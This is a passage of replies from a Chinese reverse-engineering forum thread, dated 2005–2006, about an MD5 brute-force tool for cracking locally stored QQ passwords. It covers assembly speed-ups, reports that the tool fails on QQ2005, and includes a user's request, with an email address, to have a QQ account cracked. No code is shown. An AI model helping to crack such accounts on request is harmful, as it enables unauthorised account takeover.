能力值: ( LV9,RANK:1060 )
在线值:
发帖
回帖
粉丝
12
好,内联汇编。

网上好像能下载到用写的汇编的MD5类。

只有一个MD5.H文件。

能直接嵌在C++中使用,速度也还可以。
2005-11-2 07:43
0
雪    币: 235
活跃值: (190)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
13
再一次的修改了md5算法。
现在的速度是原先的2倍了。
Md5算法以及汇编代码的优化参考了:
MD5 optimized for AMD64: http://etudiant.epita.fr/~bevand_m/papers/md5-amd64.html
怎样优化Pentium系列处理器的代码:
http://www.codingnow.com/2000/download/cpentopt.htm

这个程序就到这里为止了。暂时停止。等待更强的兄弟和代码出现。
2005-11-2 14:35
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
弱问一下,各位都试过成功了吗?我破解自己的都不行的?xp-sp2下QQ2005 正式版
2005-11-3 16:32
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
15
看不懂,急~汗~
2005-11-3 22:15
0
雪    币: 235
活跃值: (190)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
16
忍者,怎么可能不行呢?
我测试过好些文件哦。
如果你愿意,你把你目前的密码修改一下,然后把得到的密码文件和密码发给我,我测试一下。然后你再把密码修改回去。

2005正式版可能修改了加密算法。我只测试到QQ2005 beta3。
没有下载2005。

不过,现在实在是没有时间管这个东西了。
恐怕要考博士。时间更紧了。等我明年考试完毕后再来分析2005正式版的吧。
2005-11-4 09:40
0
雪    币: 441
活跃值: (149)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
17
可能版本的原因,我的QQ密码也没能正确破解.

不过这个速度破我那个13位长的密码看来还比较困难
2005-11-4 17:25
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
18
MD5算法不算太难,现有有正向算法可用,不过还未公开
2005-11-4 22:05
0
雪    币: 200
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
19
原来如此
学习了!!!!!!!!!!!
2005-11-5 01:07
0
雪    币: 200
能力值: (RANK:10 )
在线值:
发帖
回帖
粉丝
20
不懂呀~~~~~~~自己的号码没有办法取回呀!!!
2006-1-6 03:38
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
jqr
21
你好!!我看了你的算法,,也下下来看了,,
你的这个暴力破解的,也要自己做字典吧,,

可不可以告诉我你的邮箱是多少,,我想请你帮忙破解,,这个QQ对我来说很重要,,,我的邮箱是yihui9428@sina.com
2006-3-28 16:42
0
雪    币: 21
活跃值: (40)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
22
晕死。。。。强悍。。。
2006-3-28 19:25
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
23
这个是不是和信箱爆破密码那个原理一样啊,要是一样那就不太现实,我记得有个软件能生成密码表的,在用那个软件把密码表加上去.在爆破但那个密码表要120MB多呢,不太现实了,没有几个人的机器能在几秒钟或几小时核对上亿个密码
2006-3-29 08:59
0
雪    币: 1203
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
24
虽然还看不太懂,但是仔细在看,下回来研究一下。
2006-3-29 13:23
0
雪    币: 257
活跃值: (105)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
25
最初由 雪狗狗 发布
MD5算法不算太难,现有有正向算法可用,不过还未公开


兄弟,是不是真的?
2006-3-29 13:24
0
游客
登录 | 注册 方可回帖
返回
//